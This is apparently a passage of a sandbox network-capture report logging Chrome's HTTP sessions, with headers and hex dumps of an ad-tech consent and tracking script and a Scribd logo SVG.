                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: lzoelpobxEfqX3Mmg/Vbpj8Ues8PZK5VI/XradZaLvysqjcsRQsahSLgfWC9rHGsFP5uw0jwr3g=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: 4AVQGB5Q2GYHSTF1
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:36:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 28 Aug 2024 12:33:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-expiration: expiry-date="Fri, 03 Oct 2025 00:00:00 GMT", rule-id="oath-standard-lifecycle"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: JRuD6BVFDpXh1T7iUrCVWNpcX_ACBwVG
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19863
                                                                                                                                                                                                                                                                                                                                                                                        Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "bc033c3a83e1880e480086bf11ac0b0a"
                                                                                                                                                                                                                                                                                                                                                                                        Age: 1381
                                                                                                                                                                                                                                                                                                                                                                                        ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=fun
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC529INData Raw: 41 74 28 61 29 29 3e 3d 35 36 33 32 30 26 26 6f 3c 3d 35 37 33 34 33 29 29 7b 72 5b 6e 2b 3d 31 5d 3d 32 33 39 2c 72 5b 6e 2b 3d 31 5d 3d 31 39 31 2c 72 5b 6e 2b 3d 31 5d 3d 31 38 39 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 61 2b 3d 31 2c 28 69 3d 31 30 32 34 2a 28 69 2d 35 35 32 39 36 29 2b 6f 2d 35 36 33 32 30 2b 36 35 35 33 36 29 3e 36 35 35 33 35 29 7b 72 5b 6e 2b 3d 31 5d 3d 32 34 30 7c 69 3e 3e 3e 31 38 2c 72 5b 6e 2b 3d 31 5d 3d 31 32 38 7c 69 3e 3e 3e 31 32 26 36 33 2c 72 5b 6e 2b 3d 31 5d 3d 31 32 38 7c 69 3e 3e 3e 36 26 36 33 2c 72 5b 6e 2b 3d 31 5d 3d 31 32 38 7c 36 33 26 69 3b 63 6f 6e 74 69 6e 75 65 7d 7d 69 3c 3d 31 32 37 3f 72 5b 6e 2b 3d 31 5d 3d 30 7c 69 3a 69 3c 3d 32 30 34 37 3f 28 72 5b 6e 2b 3d 31 5d 3d 31 39 32 7c 69 3e 3e 3e 36 2c 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: At(a))>=56320&&o<=57343)){r[n+=1]=239,r[n+=1]=191,r[n+=1]=189;continue}if(a+=1,(i=1024*(i-55296)+o-56320+65536)>65535){r[n+=1]=240|i>>>18,r[n+=1]=128|i>>>12&63,r[n+=1]=128|i>>>6&63,r[n+=1]=128|63&i;continue}}i<=127?r[n+=1]=0|i:i<=2047?(r[n+=1]=192|i>>>6,r
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 72 6f 74 6f 74 79 70 65 2c 22 65 6e 63 6f 64 69 6e 67 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 54 65 78 74 45 6e 63 6f 64 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 68 69 73 29 29 72 65 74 75 72 6e 22 75 74 66 2d 38 22 3b 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 76 6f 63 61 74 69 6f 6e 22 29 7d 7d 29 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 54 65 78 74 45 6e 63 6f 64 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 77 69 6e 64 6f 77 2e 54 65 78 74 45 6e 63 6f 64 65 72 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rototype,"encoding",{get:function(){if(window.TextEncoder.prototype.isPrototypeOf(this))return"utf-8";throw TypeError("Illegal invocation")}})}catch(e){window.TextEncoder.prototype.encoding="utf-8"}"undefined"!=typeof Symbol&&(window.TextEncoder.prototype
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 73 29 29 7d 29 2c 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 7c 7c 30 2c 74 68 69 73 2e 69 6e 64 65 78 4f 66 28 65 2c 74 29 3d 3d 3d 74 7d 29 7d 6e 2e 72 28 74 29 3b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s))}),String.prototype.startsWith||(String.prototype.startsWith=function(e,t){return t=t||0,this.indexOf(e,t)===t})}n.r(t);var i,o,a,s=function(){return window.location.hostname},u=function(){return window.location.search},p=function(){return window.locat
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 65 2e 64 61 74 61 29 3a 65 2e 64 61 74 61 7d 63 61 74 63 68 28 65 29 7b 7d 76 61 72 20 69 3d 72 5b 74 5d 3b 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 69 2e 63 61 6c 6c 49 64 5d 26 26 28 6e 5b 69 2e 63 61 6c 6c 49 64 5d 28 69 2e 72 65 74 75 72 6e 56 61 6c 75 65 2c 69 2e 73 75 63 63 65 73 73 29 2c 6e 5b 69 2e 63 61 6c 6c 49 64 5d 3d 6e 75 6c 6c 29 7d 28 65 2c 72 2c 6f 29 7d 29 2c 21 31 29 7d 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3b 67 28 22 5f 5f 75 73 70 61 70 69 22 2c 22 5f 5f 75 73 70 61 70 69 4c 6f 63 61 74 6f 72 22 2c 30 2c 22 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 75 73 70 61 70 69 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?JSON.parse(e.data):e.data}catch(e){}var i=r[t];i&&"function"==typeof n[i.callId]&&(n[i.callId](i.returnValue,i.success),n[i.callId]=null)}(e,r,o)}),!1)}},m=function(){var e,t;g("__uspapi","__uspapiLocator",0,"__uspapiReturn"),window.__uspapi&&(e=function
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 76 61 72 20 69 3d 28 6e 7c 7c 7b 7d 29 2e 70 69 6e 67 44 61 74 61 7c 7c 7b 7d 3b 69 66 28 72 26 26 22 65 72 72 6f 72 22 21 3d 3d 69 2e 63 6d 70 53 74 61 74 75 73 29 7b 69 66 28 22 72 65 61 64 79 22 3d 3d 3d 69 2e 73 69 67 6e 61 6c 53 74 61 74 75 73 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 3b 76 61 72 20 6f 3d 69 2e 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 7c 7c 5b 5d 3b 65 28 7b 67 70 70 3a 69 2e 67 70 70 53 74 72 69 6e 67 2c 67 70 70 53 69 64 3a 6f 7d 2c 21 30 29 7d 7d 65 6c 73 65 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 65 28 7b 7d 2c 21 31 29 7d 29 29 29 3a 68 28 22 5f 5f 67 70 70 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 76 61 72 20 65 3d 49 28 29 3b 69 66 28 6a 28 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: function(n,r){var i=(n||{}).pingData||{};if(r&&"error"!==i.cmpStatus){if("ready"===i.signalStatus){clearTimeout(t);var o=i.applicableSections||[];e({gpp:i.gppString,gppSid:o},!0)}}else clearTimeout(t),e({},!1)}))):h("__gpp")};function _(){var e=I();if(j(e
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 74 49 74 65 6d 28 65 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 72 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 76 61 72 20 4f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3d 22 22 3b 66 6f 72 28 65 3d 30 3b 65 3c 33 32 3b 65 2b 2b 29 74 3d 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 2c 38 21 3d 3d 65 26 26 31 32 21 3d 3d 65 26 26 31 36 21 3d 3d 65 26 26 32 30 21 3d 3d 65 7c 7c 28 6e 2b 3d 22 2d 22 29 2c 6e 2b 3d 28 31 32 3d 3d 3d 65 3f 34 3a 31 36 3d 3d 3d 65 3f 33 26 74 7c 38 3a 74 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 65 77 20 52 65 67 45 78 70 28 6e 2b 74 2b 22 3d 28 5b 5e 22 2b 6e 2b 22 23 5d 2a 29 22 29 2c 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: tItem(e,JSON.stringify(r))}catch(e){}}var O=function(){var e,t,n="";for(e=0;e<32;e++)t=16*Math.random()|0,8!==e&&12!==e&&16!==e&&20!==e||(n+="-"),n+=(12===e?4:16===e?3&t|8:t).toString(16);return n},b=function(e,t,n){var r=new RegExp(n+t+"=([^"+n+"#]*)"),i
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 68 26 26 48 28 74 29 7d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 65 5b 72 5d 2e 6f 6e 63 6f 6d 70 6c 65 74 65 3d 6e 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 70 65 72 74 69 65 73 3b 74 2e 70 69 78 65 6c 49 64 26 26 74 2e 61 75 69 64 26 26 28 74 2e 61 75 69 64 3d 6d 65 2e 68 61 73 68 65 64 41 75 69 64 73 5b 74 2e 70 69 78 65 6c 49 64 5d 29 7d 76 61 72 20 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 6e 65 77 20 77 69 6e 64 6f 77 2e 54 65 78 74 45 6e 63 6f 64 65 72 29 2e 65 6e 63 6f 64 65 28 65 29 3b 72 65 74 75 72 6e 28 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 7c 7c 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2e 73 75 62 74 6c 65 2e 64 69 67 65 73 74 28 22 53 48 41 2d 32 35 36 22 2c 74 29 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h&&H(t)};for(var r in e)e[r].oncomplete=n};function M(e){var t=e.properties;t.pixelId&&t.auid&&(t.auid=me.hashedAuids[t.pixelId])}var k=function(e){var t=(new window.TextEncoder).encode(e);return(window.crypto||window.msCrypto).subtle.digest("SHA-256",t)}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 69 66 28 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 3d 3d 3d 74 68 69 73 2e 44 4f 4e 45 29 7b 69 66 28 32 30 30 3d 3d 3d 74 68 69 73 2e 73 74 61 74 75 73 26 26 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 26 26 22 7b 7d 22 21 3d 3d 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 3b 6d 65 2e 70 69 78 65 6c 43 6f 6e 66 69 67 73 5b 65 2e 70 69 78 65 6c 49 64 5d 3d 65 2c 76 6f 69 64 20 30 21 3d 3d 56 26 26 21 30 3d 3d 3d 56 2e 75 73 65 31 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 73 7c 7c 28 56 3d 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 44 2d 2d 2c 79 65 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: if(this.readyState===this.DONE){if(200===this.status&&this.responseText&&"{}"!==this.responseText)try{var e=JSON.parse(this.responseText);me.pixelConfigs[e.pixelId]=e,void 0!==V&&!0===V.use1stPartyCookies||(V=e)}catch(e){}D--,ye()}}function J(e){!function
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1300INData Raw: 2e 66 72 6f 6d 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 65 5b 74 5d 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 70 61 64 53 74 61 72 74 28 32 2c 22 30 22 29 7d 29 29 3b 6d 65 2e 65 6d 61 69 6c 73 5b 6e 5d 3d 72 2e 6a 6f 69 6e 28 22 22 29 2c 74 2b 2b 7d 6d 65 2e 65 6d 61 69 6c 73 41 72 65 48 61 73 68 65 64 3d 21 30 2c 79 65 28 29 7d 2c 58 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 6e 65 77 20 77 69 6e 64 6f 77 2e 54 65 78 74 45 6e 63 6f 64 65 72 29 2e 65 6e 63 6f 64 65 28 65 29 3b 72 65 74 75 72 6e 28 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 7c 7c 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2e 73 75 62 74 6c 65 2e 64 69 67 65 73 74 28 22 53 48 41 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .from(new Uint8Array(e[t])).map((function(e){return e.toString(16).padStart(2,"0")}));me.emails[n]=r.join(""),t++}me.emailsAreHashed=!0,ye()},X=function(e){var t=(new window.TextEncoder).encode(e);return(window.crypto||window.msCrypto).subtle.digest("SHA-


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        41192.168.2.1649763151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC384OUTGET /images/scribd_logo_horiz_small_slate.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 6439
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "40faa3e08deec82c2c290889a4691cb5"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522368.222927,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1378INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 32 35 70 78 22 20 68 65 69 67 68 74 3d 22 35 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 32 35 20 35 30 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 33 2e 32 20 28 33 39 30 36 39 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg width="225px" height="50px" viewBox="0 0 225 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 43.2 (39069) - http://www.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1378INData Raw: 34 36 39 34 38 33 20 36 36 2e 39 39 30 33 33 31 35 2c 31 38 2e 32 34 38 33 32 39 35 20 5a 20 4d 31 31 33 2e 39 35 30 38 36 38 2c 33 33 2e 36 38 37 35 35 36 31 20 4c 31 31 32 2e 30 31 31 36 34 32 2c 33 31 2e 37 38 35 36 32 32 34 20 43 31 30 39 2e 35 31 33 30 32 33 2c 33 34 2e 31 37 32 33 36 32 37 20 31 30 37 2e 31 36 33 35 37 35 2c 33 35 2e 35 35 32 31 39 37 20 31 30 33 2e 35 38 33 34 36 35 2c 33 35 2e 35 35 32 31 39 37 20 43 39 37 2e 38 34 30 33 37 31 2c 33 35 2e 35 35 32 31 39 37 20 39 33 2e 34 37 37 31 31 31 33 2c 33 30 2e 38 31 36 30 30 39 31 20 39 33 2e 34 37 37 31 31 31 33 2c 32 34 2e 37 33 37 32 37 39 38 20 43 39 33 2e 34 37 37 31 31 31 33 2c 31 38 2e 36 35 38 35 35 30 35 20 39 37 2e 38 30 33 30 37 38 31 2c 31 33 2e 39 39 36 39 34 38 33 20 31 30 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 469483 66.9903315,18.2483295 Z M113.950868,33.6875561 L112.011642,31.7856224 C109.513023,34.1723627 107.163575,35.552197 103.583465,35.552197 C97.840371,35.552197 93.4771113,30.8160091 93.4771113,24.7372798 C93.4771113,18.6585505 97.8030781,13.9969483 103
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1378INData Raw: 38 38 2e 37 31 36 36 32 33 2c 31 38 2e 32 34 38 33 32 39 35 20 43 31 38 38 2e 37 31 36 36 32 33 2c 32 31 2e 36 37 39 32 36 38 38 20 31 38 36 2e 36 32 38 32 32 35 2c 32 33 2e 34 33 32 30 33 31 32 20 31 38 34 2e 35 37 37 31 32 2c 32 34 2e 33 32 37 30 35 38 38 20 43 31 38 37 2e 36 37 32 34 32 34 2c 32 35 2e 32 35 39 33 37 39 33 20 31 39 30 2e 31 37 31 30 34 33 2c 32 37 2e 30 34 39 34 33 34 35 20 31 39 30 2e 31 37 31 30 34 33 2c 33 30 2e 36 36 36 38 33 37 38 20 43 31 39 30 2e 31 37 31 30 34 33 2c 33 35 2e 31 37 39 32 36 38 38 20 31 38 36 2e 34 30 34 34 36 39 2c 33 37 2e 38 32 37 30 35 38 38 20 31 38 30 2e 36 39 38 36 36 37 2c 33 37 2e 38 32 37 30 35 38 38 20 4c 31 36 39 2e 31 30 30 36 30 31 2c 33 37 2e 38 32 37 30 35 38 38 20 4c 31 36 39 2e 31 30 30 36 30 31
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 88.716623,18.2483295 C188.716623,21.6792688 186.628225,23.4320312 184.57712,24.3270588 C187.672424,25.2593793 190.171043,27.0494345 190.171043,30.6668378 C190.171043,35.1792688 186.404469,37.8270588 180.698667,37.8270588 L169.100601,37.8270588 L169.100601
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1378INData Raw: 2e 35 38 36 37 38 36 32 2c 32 35 2e 35 33 31 38 38 36 31 20 43 31 37 2e 39 31 30 39 33 36 32 2c 32 34 2e 31 33 35 33 37 33 39 20 31 38 2e 35 37 34 30 30 34 34 2c 32 32 2e 34 36 33 33 32 35 33 20 31 38 2e 35 37 34 30 30 34 34 2c 32 30 2e 35 31 35 33 35 36 20 43 31 38 2e 35 37 34 30 30 34 34 2c 31 38 2e 35 31 36 36 36 30 34 20 31 37 2e 39 33 30 34 30 33 31 2c 31 36 2e 39 34 36 38 33 33 31 20 31 36 2e 36 34 35 35 38 34 33 2c 31 35 2e 38 30 36 36 34 32 37 20 43 31 35 2e 33 36 30 37 36 35 36 2c 31 34 2e 36 36 36 30 36 38 31 20 31 33 2e 39 39 30 31 33 33 33 2c 31 34 2e 30 39 35 37 38 30 38 20 31 32 2e 35 33 33 32 39 30 33 2c 31 34 2e 30 39 35 37 38 30 38 20 43 31 32 2e 30 38 32 37 36 39 34 2c 31 34 2e 30 39 35 37 38 30 38 20 31 31 2e 34 38 36 30 34 37 38 2c 31
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .5867862,25.5318861 C17.9109362,24.1353739 18.5740044,22.4633253 18.5740044,20.515356 C18.5740044,18.5166604 17.9304031,16.9468331 16.6455843,15.8066427 C15.3607656,14.6660681 13.9901333,14.0957808 12.5332903,14.0957808 C12.0827694,14.0957808 11.4860478,1
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC927INData Raw: 2e 34 36 30 39 34 32 32 2c 33 35 2e 33 34 33 34 34 31 39 20 33 32 2e 39 33 37 32 38 36 36 2c 33 35 2e 32 35 33 39 30 32 32 20 33 33 2e 31 37 36 34 35 32 2c 33 35 2e 32 35 33 39 30 32 32 20 43 33 34 2e 32 33 36 34 30 37 36 2c 33 35 2e 32 35 33 39 30 32 32 20 33 34 2e 37 36 35 31 39 33 35 2c 33 35 2e 38 39 34 31 33 30 34 20 33 34 2e 37 36 35 31 39 33 35 2c 33 37 2e 31 37 35 37 33 39 37 20 43 33 34 2e 37 36 35 31 39 33 35 2c 33 37 2e 36 33 37 36 35 37 31 20 33 34 2e 37 31 32 37 35 32 2c 33 38 2e 30 38 34 35 38 37 31 20 33 34 2e 36 31 33 38 32 38 31 2c 33 38 2e 35 31 38 34 35 31 32 20 43 33 32 2e 38 34 39 34 38 36 36 2c 34 32 2e 38 34 33 32 35 38 31 20 32 38 2e 33 32 37 35 39 32 2c 34 35 2e 33 31 35 30 31 35 36 20 32 31 2e 37 38 35 35 30 34 36 2c 34 35 2e 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .4609422,35.3434419 32.9372866,35.2539022 33.176452,35.2539022 C34.2364076,35.2539022 34.7651935,35.8941304 34.7651935,37.1757397 C34.7651935,37.6376571 34.712752,38.0845871 34.6138281,38.5184512 C32.8494866,42.8432581 28.327592,45.3150156 21.7855046,45.3


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        42192.168.2.16497613.164.182.864436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC353OUTGET /a-05td.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: b-code.liadm.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
